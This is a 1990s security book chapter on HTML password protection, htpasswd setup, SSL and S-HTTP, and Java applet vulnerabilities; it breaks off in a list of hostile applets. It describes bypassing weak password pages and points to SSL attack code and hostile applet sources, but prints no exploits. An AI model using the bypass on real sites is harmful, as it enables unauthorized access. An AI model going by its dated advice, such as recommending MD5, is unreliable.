Maximum Security:

A Hacker's Guide to Protecting Your Internet Site and Network

30 Languages, Extensions, and Security

This chapter examines the relationship between languages, extensions, and security. Traditionally, the term language refers (in the computer world) to some form of computer language, a set of common instructions that when properly assembled, create a program or application. Most users are well aware of at least one computer language: BASIC, Pascal, FORTRAN, C, C++, and so on. Such languages are traditionally understood to be real languages because one can construct a program with them that can thereafter run generally without need of external support from an interpreter.

Language

So much for tradition. Today, the climate is different. For example, the popularity of shell languages, which are used primarily on the UNIX platform, has greatly increased. They are written in a syntax that meets the requirements of the shell or command interpreter of the given platform. These languages cannot create entirely standalone programs that execute without a command interpreter, yet these languages have become vastly popular. A programmer who can proficiently program in such a language is almost guaranteed to land a job somewhere.

NOTE: For MS-DOS and Windows users who have never worked on a UNIX platform: Shell language programs can be likened to large batch files. They are composed of various regular expression operations, pipes, re-directs, system calls, and so forth.

As such, these languages stretch the definition of language itself. For even though these programs cannot run without assistance from the underlying system, they are indeed full-fledged programs that can and often do run various services and functions on the Internet.

Similarly, there are interpreted languages such as Perl that offer extreme power to the user. These can often interface not just with their own interpreter, but with various shell languages and system calls. They can even be nested within other language constructs. A typical example would be a Perl script nested within a TCL script or within a C program. These are bona fide languages that cross the barriers (or perhaps bridge the gaps) between one or more real languages.

But where does the definition of language stop? For example, Hypertext Markup Language (HTML) is a language, even though it is completely useless unless interpreted by a hypertext reader (Navigator, Internet Explorer, Grail, Arena, Lynx, Opera, Powerbrowser, Netcruiser, and so forth). True, HTML is a language, but its application is limited (PostScript stands in a similar light).

JavaScript and VBScript are languages that actually stand squarely between Perl and HTML. JavaScript and VBScript perform only a limited set of tasks. They are designed to be interpreted by the browser, true, but unlike HTML, these languages perform tasks dynamically (examples include getting and processing variables to perform a calculation or other process). It is likely that in order to create a fully functional and dynamic Web-page environment, you will use a combination of languages.

That said, for the purpose of this chapter, a language is any set of instructions that can perform more than simple display processes, dynamically and without user intervention (that is, any set of instructions that could potentially automate a task).

Extensions

In contrast, an extension is any set of instructions, declarations, or statements that formulate one application of a particular language. Extensions are elements of (or designed to enhance) a particular language. Most commonly, the term extensions refers to HTML extensions, the majority of which are proprietary.

For example, consider the use of tables in HTML. Tables are extensions. They are statements that alter the face of a Web page. The use of tables is becoming more common because tables provide near-pixel-perfect control of the Web page's appearance. Extremely high-end Web development packages use tables to offer almost word-processor control of your Web page's look and feel. Fusion by NetObjects is an example of this phenomenon. In a WYSIWYG environment, the user can place pictures, text, sound, or video anywhere on the page. Tables mathematically plot out the location. The final result is accomplished by using invisible table structures that surround the object in question, thus giving the appearance of free-form location of the object. Fusion by NetObjects is often referred to as the "PageMaker of the WWW."

Perhaps the easiest way to grasp the concept of extensions is to understand that they are statements that extend the originally intended implementation of HTML. These are new features, often proposed by proprietary entities such as Netscape or Microsoft. Most extensions are designed to enhance the surfer's experience by offering more dynamic visual or multimedia content. These are proprietary and only work in browsers designed to read them.

HTML

On the surface, it sounds silly. HTML is a non-dynamic language that cannot serve a purpose unless read by a browser. How could it possibly have security implications? Well, it does. To understand why and what measures are being undertaken to address those implications, consider the original idea behind HTML. The intended purpose was to provide a platform-independent method of distributing data. It so happens that this original implementation was intended for use with plain (clear) text. At its most simple, then, a Web page consists of clear text. Examine the following HTML code:

<HTML>
<HEAD>
</HEAD>
<BODY>
<P >This is a page</P>
</BODY>
</HTML>

Pretty simple stuff. This HTML does no more than print a page that says This is a page. No extensions are used; the page would be boring. However, we could add an extension to change the background color to white:

<HTML>
<HEAD>
</HEAD>
<BODY bgcolor = "#ffffff">
<P >This is a page.</P>
</BODY>
</HTML>

The <BODY> tag sets the color. There are dozens of other tags we could use to add sound, animation, video, and so forth. However, all these still appear in clear text. Likewise, when you submit information in an HTML form, it is generally accepted (and parsed by a Perl program or other CGI application) in clear text.

When the WWW was used primarily for research and education, that was fine. The material could be intercepted across a network, but there was a relatively low risk of this actually occurring. However, time passed, and eventually people became concerned. Extensions were added to the HTML specification, including a password field. This field is called by issuing the following statement within a form:

INPUT TYPE=PASSWORD

This tag produces an input field that does not echo the password to the screen. Instead, characters of the password are represented by asterisks. Unfortunately, this field does very little to enhance real security.

First, the main concern is not whether someone standing over the shoulder of the user can see the password, but whether someone intercepting traffic can. This password field does little to prevent that. Moreover, the password field (which is used by thousands of sites all over the world) does absolutely nothing to prevent someone from entering the so-called protected site.

True, average users--when confronted with a page so protected--shy away and assume that if they don't have a password, they cannot get in. However, to anyone with even minimal knowledge of HTML implementation, this is the modern equivalent of a "Beware of Dog" or "Keep Off the Grass" sign. By venturing into the directory structure of the target server, any user can bypass this so-called security measure.

For example, suppose the password-protected site's address was this:

http://www.bogus_password_protection.com/~mypage

When a user lands on this page, he or she is confronted by a field that asks for a password. If the incorrect password is entered, a page (perhaps www.bogus_password_protection.com/~mypage/wrong.html) is fed to the user to inform him or her of the authentication failure. On the other hand, if the user enters a correct password, he or she is forwarded to a page of favorite links, funny jokes, or whatever (for example, www.bogus_password_protection.com/~mypage/jokes).

Using any garden-variety search engine, one can quickly identify the pages beneath the password page. This is done by issuing an explicit, case-sensitive, exact-match search string that contains the base address, or the address where the HTML documents for that user begin (in this case, http://www.bogus_password_protection.com/~mypage). The return will be a list of pages that are linked to that page. Naturally, the site's designer will include a Home button or link on each subsequent page. This way, users can navigate through the site comfortably.

By opening the location of all subsequent pages on that site, the user can bypass the password protection of the page. He or she can directly load all the pages that are loaded after a user provides the correct password. The only time that this technique will not work is when the password field is tied to a password routine that dynamically generates the next page (for example, a Perl script might compare the password to a list and, if the password is good, a subsequent page is compiled with time-sensitive information pulled from other variables, such as a "tip of the day" page).

TIP: Such implementations are the only valid instance in which to use this password field. In other words, you use the field to obscure the password to passers-by and point that form to a script on the server's local drive. All comparisons and other operations are done within the confines of that script, which also resides in a protected directory.

This brings us to one of the most commonly asked questions: How does one effectively password protect a site?

Password Protection for Web Sites: `htpasswd`

Password protection is accomplished with any implementation of htpasswd. This program (which comes stock with most Web server distributions) is designed to provide real password authentication. You will know when you land on a site using htpasswd because a dialog box demanding a password from the user is immediately issued. In Netscape, that dialog box appear much like the image in Figure 30.1.

FIGURE 30.1.
The htpasswd prompt.

Those using Mosaic for the X Window System will see a slightly different prompt (see Figure 30.2).

FIGURE 30.2.
The htpasswd prompt in Mosaic for X.

If the user enters the correct password, he or she will be referred to the next page in sequence. However, if the user fails to provide the correct password, he or she will be forwarded to a page that looks very similar to the one shown in Figure 30.3.

FIGURE 30.3.
The htpasswd failed authorization screen.

As authentication schemes go, htpasswd is considered fairly strong. It relies on the basic HTTP authentication scheme, but will also conform to MD5.

CAUTION: Be careful about setting the option for MD5. Not all browsers support this option, and your users may end up quite frustrated due to a failure to authenticate them. Known supported browsers currently include Mosaic, NCSA, and Spyglass.

A word to the wise: although the passwords of users are ultimately stored in encrypted form, the password is not passed in encrypted form in basic HTTP authentication. As reported by NCSA in the Mosaic User Authentication Tutorial:

In Basic HTTP Authentication, the password is passed over the network not encrypted but not as plain text--it is "uuencoded." Anyone watching packet traffic on the network will not see the password in the clear, but the password will be easily decoded by anyone who happens to catch the right network packet.

Cross Reference: Find the Mosaic User Authentication Tutorial on the Web at http://hoohoo.ncsa.uiuc.edu/docs-1.5/tutorials/user.html.

This is different from the MD5 implementation. As reported by the same document:

In MD5 Message Digest Authentication, the password is not passed over the network at all. Instead, a series of numbers is generated based on the password and other information about the request, and these numbers are then hashed using MD5. The resulting "digest" is then sent over the network, and it is com-bined with other items on the server to test against the saved digest on the server.

It is my opinion that in intranets or other networked environments where you can be sure of what browser is being used, you should implement the MD5 authentication scheme.

Who Can Use htpasswd? Anyone can use htpasswd to password protect any directory within his or her directory tree. That is, a system administrator can protect an entire Web site, or a user can selectively password protect directories within his or her /~user hierarchy. However, there are some practical obstacles. First, the program must be available for you to use. That means the following:

The machine on which the site resides must be a UNIX box.
The administrator there must have gotten htpasswd with the distribution of his or her Web-server kit (NCSA; Apache also supports this utility).
The administrator must have compiled the source to a binary or otherwise obtained a binary. You may go to the directory and find that only the source is available and the permissions are set to root as well.

Check whether all these conditions are met. You can generally find the location of htpasswd (without bothering your sysad) by issuing the whereis command at a shell prompt. However, htpasswd is usually located in the /usr/local/etc/httpd/support directory.

TIP: Your PATH environment variable is probably not set to reflect that directory, and I would not bother to change it. You will only be using the program once or twice unless you are engaged in system administration.

What if My Sysad Doesn't Have htpasswd and Won't Get It? Some system administrators can be difficult to get hold of, or may simply ignore user requests for the htpasswd utility. If you encounter this situation, there is an alternative: htpasswd.pl. htpasswd.pl is a Perl script designed to replace the current implementation of htpasswd. It was written by Ryun Whitfield Schlecht (also known as Nem), a 22-year-old Computer Science major at North Dakota State University.

Cross Reference: You can find Nem at http://abattoir.cc.ndsu.nodak.edu/~nem/. The code for htpasswd.pl is located at http://abattoir.cc.ndsu.nodak.edu/~nem/perl/htpass.html.

Using htpasswd Implementing htpasswd takes only a few seconds. The first step is to create a file named .htaccess in the target directory. This is a plain-text dot file that can be edited with any editor on the UNIX platform (I prefer vi). The contents of the file will appear as follows:

AuthUserFile /directory_containing_.htpasswd/.htpasswd
AuthGroupFile /directory_containing_a_group_file
AuthName ByPassword
AuthType Basic

<Limit GET>
require user _some_username_here
</Limit>

Let's go through each line:

The first line specifies the AuthUserFile. This is where the actual passwords are stored, in a file named .htpasswd (I will address the construct of that file momentarily).
The second line specifies the location of the group file (called .htgroup). This is where usernames can be categorized into groups. In this example, we will not use a group file because we do not have many groups.
The third and fourth lines express the way in which the password will be authenticated. (The technique being used is basic HTTP authentication because not all browsers support MD5).
The fifth, sixth, and seventh lines express which users are allowed to perform a GET operation on the directory (that is, which users are allowed to access that directory). This is where you put the username.

TIP: All paths should be expressed in their absolute form. That is, the entire path should be expressed. If you fail to do so, the authentication routine will fail.

Next, you will create the .htpasswd file. This file is a special file; it can be created with a regular editor, but I would advise against it. Instead, use your version of htpasswd like so:

htpasswd -c /directory_containing_htpasswd/.htpasswd username

This will create the file and prompt you for a password for the username. You will have to type this password twice: once to set it and once to confirm it.

CAUTION: Make certain you have created the .htpasswd file in the same directory as you indicated in the .htaccess file. Otherwise, the system will be unable to find the .htpasswd file and, no matter what password is entered, users from outside will meet with a failed authorization.

If you examine the .htpasswd file after you finish, you will see that it contains the username and an encrypted string, which is the password in encrypted form. It will look something like this:

username: o3ds2xcqWzLP7

At this point, the directory is password protected. Anyone landing on that page will be confronted with a password dialog box.

If you do not have Telnet access, you really cannot perform the preceding operation. If your provider has denied Telnet access, explain the situation; perhaps it can offer you Telnet on a limited basis so you can set the htpasswd. I would not use a provider that did not offer Telnet access, but there are many out there.

CAUTION: In the past, I have seen users attempt to set up these files--without Telnet--using FTP clients. Do NOT try this, or you will be unable to access your page later. After these files exist in your directory, the dialog box will appear every time. You would then have to return to FTP and delete the files. However, depending on how the permissions were set, you might be unable to do so. If you do not have access to Telnet and know very little about UNIX, do NOT attempt to establish such files on your server's drive.

HTML Security Extensions

I mentioned several security extensions to HTML earlier in this book. Now it's time to get a bit more specific, examining each in turn.

Because the Web has now become a popular medium for commerce, there is an enormous push for security in HTML. Because the majority of garden-variety HTML traffic is in clear text, the development of cryptographic and other data-hiding techniques has become a big business. Thus, most of the proposals are proprietary. I will address two: the Secure Sockets Layer (SSL) and S-HTTP.

Secure Sockets Layer (Netscape) Secure Sockets Layer (SSL) is a system designed and proposed by Netscape Communications Corporation. The SSL protocol supports a wide range of authentication schemes. These can be implemented using various cryptographic algorithms, including the now-popular DES. As reported by Netscape, in its specification of SSL:

The primary goal of the SSL Protocol is to provide privacy and reliability between two communicating applications. The protocol is composed of two layers. At the lowest level, layered on top of some reliable transport protocol (e.g., TCP[TCP]), is the SSL Record Protocol. The SSL Record Protocol is used for encapsulation of various higher level protocols. One such encapsulated protocol, the SSL Handshake Protocol, allows the server and client to authenticate each other and to negotiate an encryption algorithm and cryptographic keys before the application protocol transmits or receives its first byte of data.

SSL has been characterized as extremely secure, primarily because the connection security also incorporates the use of MD5. The protocol therefore provides connection integrity as well as authentication. The design of SSL has been deemed sufficiently secure that very powerful software firms have incorporated the technology into their products. One such product is Microsoft's Internet Information Server.

NOTE: Microsoft's early implementation of SSL required that you obtain a certificate from a third party, in this case VeriSign. This certificate verified your identity, a contingency that not everyone is happy about.

SSL was unveiled to the world and largely accepted by security circles, primarily because the system combined some of the most powerful encryption techniques currently available. But the bright future of SSL soon met with dark and stormy skies. The implementation initially introduced by Netscape Communications Corporation simply wasn't strong enough. On September 19, 1995, news that SSL had been cracked was plastered across the national headlines. As John Markoff noted in his article "Security Flaw Is Discovered In Software Used In Shopping," which appeared in The New York Times on September 19, 1995:

A serious security flaw has been discovered in Netscape, the most popular software used for computer transactions over the Internet's World Wide Web, threatening to cast a chill over the emerging market for electronic commerce...The flaw, which could enable a knowledgeable criminal to use a computer to break Netscape's security coding system in less than a minute, means that no one using the software can be certain of protecting credit card information, bank account numbers or other types of information that Netscape is supposed to keep private during online transactions.

Several students (including Ian Goldberg and David Wagner) found that within minutes, they could discover the key used in the encryption process. This (for a time, at least) rendered SSL utterly useless for serious security.

Cross Reference: C source code has been posted to the Internet that you can use to attack the early, flawed implementations of SSL. You can get that source at http://hplyot.obspm.fr:80/~dl/netscapesec/unssl.c.

The flaw is best expressed by the Netscape advisory ("Potential Vulnerability in Netscape Products") issued shortly after the story broke:

Current versions of Netscape Navigator use random information to generate session encryption keys of either 40 or 128 bits in length. The random information is found through a variety of functions that look into a user's machine for information about how many processes are running, process ID numbers, the current time in microseconds, etc. The current vulnerability exists because the size of random input is less than the size of the subsequent keys. This means that instead of searching through all the 2^128 possible keys by brute force, a potential intruder only has to search through a significantly smaller key space by brute force. This is substantially easier problem to solve because it takes much less compute time and means 40-bit or 128-bit key strength is substantially reduced.

Cross Reference: "Potential Vulnerability in Netscape Products" can be found on the Web at http://www.netscape.com/newsref/std/random_seed_security.html.

As Netscape was quick to point out, there has never been a known instance of any Net surfer's financial information being stolen in such a manner. Nor have there been any recorded instances of such information being intercepted over the Internet. At the day's end, the technique employed was complex and not one that would be commonly known to criminals. However, the episode threw many products into a suspicious light, and again, Internet security was reduced to a hope rather than a reality.

Information now suggests that peripheral components used in implementation of SSL may even be flawed. Specifically, MD5 is now under suspicion. On May 2, 1996, a member of the German Information Security Agency issued a report titled "Cryptanalysis of MD5 Compress." In it, the author demonstrates a weakness inherent in MD5.

Cross Reference: "Cryptanalysis of MD5 Compress" by Dr. Hans Dobbertin can by found at http://www.cs.ucsd.edu/users/bsy/dobbertin.ps.

Cross Reference: Some forces in encryption suggest that MD5 be phased out. To learn more about these matters, check out the Secure Sockets Layer Discussion List. In this mailing list, members discuss the various security characteristics of SSL. You can subscribe to that list by sending a mail message to ssl-talk-request@netscape.com. The mail message should be empty, and the Subject line should include the word SUBSCRIBE. The material discussed in the Secure Sockets Layer Discussion List is quite technical. If you are new to the subject matter, it would be wise to obtain the FAQ (http://www.consensus.com/ security/ssl-talk-sec01.html).

Today, a stronger version of SSL is selling like wildfire. To date, there have been no successful attempts to crack these newer implementations; they have a much stronger random-generation routine. Dozens of third-party products now support SSL, including most of the browser clients commercially available (and a good number of servers).

Cross Reference: An interesting comparison of third-party products that support SSL is available at http://webcompare.iworld.com/compare/security.shtml.

S-HTTP S-HTTP (Secure Hypertext Transfer Protocol) differs from SSL in several ways. First, Netscape's SSL is a published implementation; therefore, there is a wide range of information available about it. In contrast, S-HTTP is an often-discussed but seldom-seen protocol.

The main body of information about S-HTTP is in the "Internet Draft" authored by E. Rescorla and A. Schiffman of Enterprise Integration Technologies (Eit.com). Immediately on examining that document, you can see that S-HTTP is implemented in an entirely different manner from SSL. For a start, S-HTTP works at the application level of TCP/IP communications, whereas SSL works at the data-transport level.

As you learned in Chapter 6, "A Brief Primer on TC/IP," these levels represent different phases of the TCP/IP stack implementation. Application-level exchanges are those available to (and viewable by) the operator. Well-known application-level protocols include FTP, Telnet, HTTP, and so on.

A company called Terisa Systems (www.terisa.com) licenses several development toolkits that incorporate S-HTTP into applications. These toolkits come with pre-fabbed libraries and a crypto engine from RSA.

S-HTTP's main feature (and one that is very attractive) is that it does not require users to engage in a public key exchange. Remember how I wrote about Microsoft's implementation of SSL, which required that you obtain a certificate? This means you have to identify yourself to a third party. In contrast, according to Rescorla and Schiffman:

S-HTTP does not require client-side public key certificates (or public keys), supporting symmetric session key operation modes. This is significant because it means that spontaneous private transactions can occur without requiring individual users to have an established public key.

Cross Reference: You can find "The Secure HyperText Transfer Protocol" by E. Rescorla and A. Schiffman on the Web at http://www.eit.com/creations/s-http/draft-ietf-wts-shttp-00.txt.

In my view, this seems more acceptable and less Orwellian. There should never be an instance where an individual MUST identify himself or herself simply to make a purchase or cruise a page, just as one should not have to identify oneself at a bookstore or a supermarket in the "real" world. One has to question the motivation of corporations such as Microsoft that insist on certificates and public key schemes. Why are they so concerned that we identify ourselves? I would view any such scheme with extreme suspicion. In fact, I would personally lobby against such schemes before they become acceptable Internet standards. Many other efforts in electronic commerce are aimed toward complete anonymity of the client and consumer. These efforts seem to be working out nicely, without need for such rigid identification schemes.

Moreover, the S-HTTP may be a more realistic choice. Even if public key exchange systems were desirable (as opposed to anonymous transactions), the number of Internet users with a public key is small. New users in particular are more likely targets for online commercial transactions, and the majority of these individuals do not even know that public key systems exist. If a public key is required to complete a transaction using a secure protocol, many millions of people will be unable to trade. It seems highly unrealistic that vendors will suggest methods of educating (or prodding) consumers into obtaining a public key.

NOTE: Although S-HTTP does not require public key exchange-style authentication, it supports such authentication. It also supports Kerberos authentication, which is an additional benefit.

S-HTTP also supports message authentication and integrity in much the same fashion as SSL. As noted in "The Secure HyperText Transfer Protocol":

Secure HTTP provides a means to verify message integrity and sender authenticity for a HTTP message via the computation of a Message Authentication Code (MAC), computed as a keyed hash over the document using a shared secret--which could potentially have been arranged in a number of ways, e.g.: manual arrangement or Kerberos. This technique requires neither the use of public key cryptography nor encryption.

To date, not enough public information about S-HTTP is available for me to formulate a truly educated advisory. However, it seems clear that the designers integrated some of the best elements of SSL while allowing for maximum privacy of client users. Also, I am aware of no instance in which S-HTTP has been cracked, but this may be because the cracking communities have not taken as lively an interest in S-HTTP as they have Netscape. No one can say for certain.

HTML in General

The problems with Web security that stem from HTML are mainly those that involve the traffic of data. In other words, the main concern is whether information can be intercepted over the Internet. Because commerce on the Internet is becoming more common, these issues will continue to be a matter of public concern.

As it currently stands, very few sites actually use secure HTML technology. When was the last time you landed on a page that used this technology? (You can recognize such pages because the little key in the left corner of Netscape Navigator is solid as opposed to broken.) This, of course, depends partly on what sites you visit on the WWW. If you spend your time exclusively at sites that engage in commerce, you are likely to see more of this activity. However, even sampling 100 commerce sites, the number of those using secure HTTP technology is small.

Java and JavaScript

Java and JavaScript are two entirely different things, but they are often confused by nonprogrammers as being one and the same. Here's an explanation of each:

JavaScript is a scripting language created at Netscape Communications Corporation. It is designed for use inside the Netscape Navigator environment (and other supported browsers). It is not a compiled language, it does not use class libraries, and it is generally nested within HTML. In other words, you can generally see JavaScript source by examining the source code of an HTML document. The exception to this is when the JavaScript routine is contained within a file and the HTML points to that source. Standalone applications cannot be developed with JavaScript, but very complex programs can be constructed that will run within the Netscape Navigator environment (and other supported browsers).
Java, developed by Sun Microsystems, is a real, full-fledged, object-oriented, platform-independent, interpreted language. Java code requires a Java interpreter to be present on the target machine and its code is not nested. Java can be used to generate completely standalone programs. Java is very similar in construct to C++.

JavaScript is far more easily learned by a non-programmer; it can be learned by almost anyone. Moreover, because Netscape Navigator and supported browsers already contain an interpreter, JavaScript functions can be seen by a much wider range of users. Java, in contrast, is to some degree dependent on class files and therefore has a greater overhead. Also, Java applications require a real Java runtime environment, a feature that many Netizens do not currently possess (users of Lynx, for example). Finally, Java applets take infinitely more memory to run than do JavaScript functions; although, to be fair, badly written JavaScript functions can recursively soak up memory each time the originating page is reloaded. This can sometimes lead to a crash of the browser, even if the programmer had no malicious intent.

Of these two languages, Java is far more powerful. In fact, Java is just as powerful as its distant cousin, C++. Whole applications have been written in Java. HotJava, the famous browser from Sun Microsystems, is one example. Because Java is more powerful, it is also more dangerous from a security standpoint.

Java

When Java was released, it ran through the Internet like a shockwave. Programmers were enthralled by the prospect of a platform-independent language, and with good reason. Developing cross-platform applications is a complex process that requires a lot of expense. For example, after writing a program in C++ for the Microsoft Windows environment, a programmer faces a formidable task in porting that application to UNIX.

Special tools have been developed for this process, but the cost of such engines is often staggering, especially for the small outfit. Many of these products cost more than $5,000 for a single user license. Moreover, no matter what conversion vendors may claim about their products, the porting process is never perfect. How can it be? In anything more than a trivial application, the inherent differences between X and Windows 95, for example, are substantial indeed. Quite frequently, further human hacking must be done to make a smooth transition to the targeted platform.

With these factors in mind, Java was a wonderful step forward in the development of cross- platform applications. Even more importantly, Java was designed (perhaps not initially, but ultimately) with components specifically for development of platform-independent applications for use on the Internet. From this, we can deduce the following: Java was a revolutionary step in Internet-based development (particularly that type of development that incorporates multimedia and living, breathing applications with animation, sound, and graphics). It is unfortunate that Java had such serious security flaws.

I'd like to explain the process of how Java became such a terrific security issue on the Internet. This may help you understand the concept of how security holes in one language can affect the entire Net community.

Certain types of languages and encryption routines are composed of libraries and functions that can be incorporated into other applications. This is a common scenario, well known to anyone who uses C or C++ as a programming language. These libraries consist of files of plain text that contain code that defines particular procedures, constant variables, and other elements that are necessary to perform the desired operation (encryption, for example). To include these libraries and functions within his or her program, the programmer inserts them into the program at compile time. This is generally done with an #include statement, as in

#include <stdio.h>

After these routines have been included into a program, the programmer may call special functions common to that library. For example, if you include crypt() in your program, you may call the encryption routines common to the crypt library from anywhere within the program. This program is then said to have crypt within it and, therefore, it has cryptographic capabilities.

Java was such the rage that Netscape Communications Corporation included Java within certain versions of its flagship product, Navigator. That means supported versions of Netscape Navigator were Java enabled and could respond to Java programming calls from within a Java applet. Thus, Java applets could directly affect the behavior of Navigator.

NOTE: The Java runtime environment incorporated into the code of the Netscape Navigator browser (and many other browsers) is standard and totally distinct from the Java runtime engine provided with the Java Development Kit (JDK).

Because Navigator and Internet Explorer are the two most commonly used browsers on the Internet, an entire class of users (on multiple platforms) could potentially be affected by Java security problems. Some of those platforms are

Windows, Windows 95, and Windows NT
Any supported flavor of UNIX
Macintosh

What Was All the Fuss About?

The majority of earth-shaking news about Java security came from a handful of sources. One source was Princeton University's Department of Computer Science. Drew Dean, Edward W. Felten, and Dan S. Wallach were the chief investigators at that location. Felten, the lead name on this list, is an Assistant Professor of Computer Science at Princeton University since 1993 and a one-time recipient of the National Young Investigator award (1994). Professor Felten worked closely with Dean and Wallach (both computer science graduate students at Princeton) on finding holes unique to Java.

Holes within the Java system are not the Felten team's only claim to fame, either. You may recall a paper discussed earlier in this book on a technique dubbed Web spoofing. The Felten team (in conjunction with Dirk Balfanz, also a graduate student) authored that paper as well, which details a new method of the man-in-the-middle attack.

In any event, weaknesses within the Java language that were identified by this team include the following:

Denial-of-service attacks could be effected in two ways: first, by locking certain internal elements of the Netscape and HotJava browsers, thereby preventing further host lookups via DNS; second, by forcing CPU and RAM overutilization, thus grinding the browser to a halt. Further, the origin of such an attack could be obscured because the detrimental effects could be delayed by issuing the instructions as a timed job. Therefore, a cruiser could theoretically land on the offending page at noon, but the effect would not surface until hours later.
DNS attacks could be initiated where the browser's proxies would be knocked out, and the system's DNS server could be arbitrarily assigned by a malicious Java applet. This means that the victim's DNS queries could be re-routed to a cracked DNS server, which would provide misinformation on hostnames. This could be a very serious problem that could ultimately result in a root compromise (if the operator of the victim machine were foolish enough to browse the Web as root).
At least one (and perhaps more) version of Java-enabled browsers could write to a Windows 95 file system. In most all versions, environment variables were easily culled from a Java applet, Java applets could snoop data that many feel is private, and information could be gathered about where the target had been.
Finally, Java suffered from several buffer overflow problems.

Public reaction to the findings of the Felten team was not good. This was especially so because the researchers wrote that they had advised Sun and Netscape of the problems. The two giants responded with a fix, but alas, many of the original problems remained, opened by other avenues of attack.

Cross Reference: The Felten team's paper, titled "Java Security: From HotJava to Netscape and Beyond," can be found on the Web at http://www.cs.princeton.edu/sip/pub/secure96.html.

JavaSoft (the authoritative online source for Java developments) responded to these reports promptly, although that response did not necessarily indicate a solution. In one online advisory, the folks at JavaSoft acknowledge that hostile Java applets have been written (they even gave a few links) and suggest that work was underway to correct the problems. However, the advice on what to do if such applets are encountered offers users very little sense of security. For example, when confronted by a Java applet that entirely blew away your browser, the advice was this:

...one way to recover from this applet is to kill the browser running on your computer. On a UNIX system, one way to accomplish this is to remotely log into your computer from another computer on your local network, use ps to find the process ID that matches the hijacked browser's process ID, and issue a kill -9 PID.

Cross Reference: JavaSoft's advisory can be found at http://java.javasoft.com/sfaq/denialOfService.html.

Killing your browser is hardly a method of recovering from an attack. For all purposes, such a denial-of-service attack has effectively incapacitated your application.

It was determined that users running Java-enabled browsers were posing risks to those networks protected by firewalls. That is, Java would flow directly through the firewall; if the applet was malicious, firewall security could be breached then and there. Crackers now have lively discussions on the Internet about breaking a firewall in this manner. And, because Java shares so many attributes with C++ (which may be thought of as a superset of C), the programming knowledge required to do so is not foreign terrain to most talented crackers.

Many proponents of Java loudly proclaimed that such an attack was impossible, a matter of conjecture, and knee-jerk, alarmist discussion at best. Those forces were silenced, however, with the posting of a paper titled "Blocking Java Applets at the Firewall." The authors of this paper demonstrated a method through which a Java applet could cajole a firewall into arbitrarily opening otherwise restricted ports to the applet's host. In other words, an applet so designed could totally circumvent the basic purpose (and functionality) of the firewall, full stop. Thus, in addition to other weaknesses that Java had already introduced, it was also found to be an ice pick with which to stab through a firewall.

Cross Reference: "Blocking Java Applets at the Firewall," by David M. Martin Jr., Sivaramakrishnan Rajagopalan, and Aviel D. Rubin, can be found on the Web at http://www.cs.bu.edu/techreports/96-026-java-firewalls.ps.Z.

Although many of these matters have been fixed by Sun and JavaSoft, some problems still remain. Further, many individuals are still using older versions of the Java runtime and development kits, as well as older versions of Java-enabled browsers. However, in fairness, JavaSoft and Sun have resolved many of the problems with this new language.

Cross Reference: To get a closer view of JavaSoft and Sun's fixes (by version number), check out http://www.javasoft.com:80/sfaq/index.html.

For the average user, hostile Java applets (at least, those produced thus far by the academic community) can produce no more than minor inconveniences, requiring reboot of the browser or the machine. However, for those who work in information security, Java has an entirely different face. Any unwanted element that can slip through a firewall is indeed a threat to security. If you are a system administrator of an internal network that provides partial or full access to the Internet, I advise you to forbid (at least for the moment) the use of browsers that are Java enabled or enforce a policy that users disable Java access.

The Java controversy teaches us this: The Internet is not secure. Moreover, programming languages and techniques deemed secure today are almost invariably found to be insecure tomorrow. In a recent New Riders book on Internet security (Internet Security: Professional Reference), the authors discuss the wonderful features of Java security (there is even a section titled "Java is Secure"). I am certain that at the time the book was written, the authors had no idea about the security flaws of Java. So carefully consider this point: Any new technology on the Internet should be viewed with suspicion. It is wise to remember that even today, holes are occasionally found in Sendmail, many years after its introduction to the network.

Perhaps the most threatening element of Java is this: We have not yet seen the cracking community work with it. Traditionally, cracking is done using garden-variety tools that have been around for years, including C and Perl. However, it is clear that Java could be used in information warfare as a tool to disable machines or otherwise disrupt service.

Cross Reference: For an interesting viewpoint on the use of Java in information warfare, check out Mark D. LaDue's article, "Java Insecurity," scheduled to appear in the Spring 1997 issue of the Computer Security Institute's Computer Security Journal. The article can be found on the Web at http://www.math.gatech.edu/~mladue/Java_insecurity.html.

I should point out here that there have been no recorded instances of Java security breaches in the wild. All the attack schemes developed and tested have been cultivated in either academic or corporate research environment. Furthermore, for the average user, Java security is not a critical issue. Rather, it is within the purview of system administrators and information- security experts that this information is most critical. Actual dangers to the PC computing communities are discussed later in this chapter when I treat Microsoft's ActiveX technology at length.

To learn more about Java security, there are a number of papers you must acquire. Many of these papers are written by programmers for programmers, so much of the material may seem quite technical. Nevertheless, the average user can still gain much important information from them.

Java Security: Weaknesses and Solutions. Jean-Paul Billon, Consultant VIP DYADE. This document is significant because it is one of the latest treatments of the Java security problem. Updates on this document extend into December 1996. This is an invaluable resource for programmers as well as the general public. The information contained within this document addresses weaknesses within the runtime system as well as the language itself. More importantly, the document gives two practical examples and proposes some possible solutions. Excellent.

http://www.dyade.fr/actions/VIP/JS_pap2.html

Low Level Security in Java. Frank Yellin. This paper is one of the first papers to address Java security. It is an important paper, particularly for programmers and system administrators, because it describes the basic characteristics of the Java language and the security considerations behind it.

http://www.javasoft.com/sfaq/verifier.html.

Java Security. Joseph A. Bank (MIT). This paper is a must-read for anyone who wants to learn about Java security. It is a well-written and often easily read analysis of Java and its security features. Most importantly, the paper takes the reader through stages, making it easier for the newcomer to programming to understand the features of Java.

http://www.swiss.ai.mit.edu/~jbank/javapaper/javapaper.html

So, you're wondering exactly what Java can do to your machine. First, for some time, people insisted that Java could not in any way access information located on the hard drive of your computer. Security features within the Java language generally forbid this from happening. However, one independent researcher, Jim Buzbee, was able to develop an applet that did access such information. On his Web page (where you can demo the applet), Buzbee explains:

In most Java implementations, security policy forbids applets from reading the local directory structure. I have discovered that it is possible for an applet, using only Java, to determine if specified files exist on the file system of the client machine. The applet I have prototyped cannot read or write to the file, but it can detect its presence. My applet is then free to surreptitiously e-mail the result of the file search to any machine on the Internet, for example MarketResearch@ microsoft.com.

Cross Reference: Buzbee's Web page is at http://www.nyx.net/~jbuzbee/hole.html.

Buzbee's applet is truly extraordinary. It accesses your hard drive and looks for some commonly known (and jealously protected) files. One is the /etc/passwd file. Another is MSOffice (a directory on machines using Microsoft Office). For some reason, the applet moves quite slowly. However, it is capable of identifying which files exist on the drive.

Cross Reference: If you want to check out the applet for yourself (it does no harm and will not lock your browser), you can access it at http://www.nyx.net/~jbuzbee/filehole.html.

The ultimate page for hostile applets is Mark DeLue's. It sports a list of hostile Java applets and their source code. Some of the more amusing ones include

NoisyBear.java--Displays a bear that runs an audio clip. The bear cannot be deleted without killing and rebooting the browser.
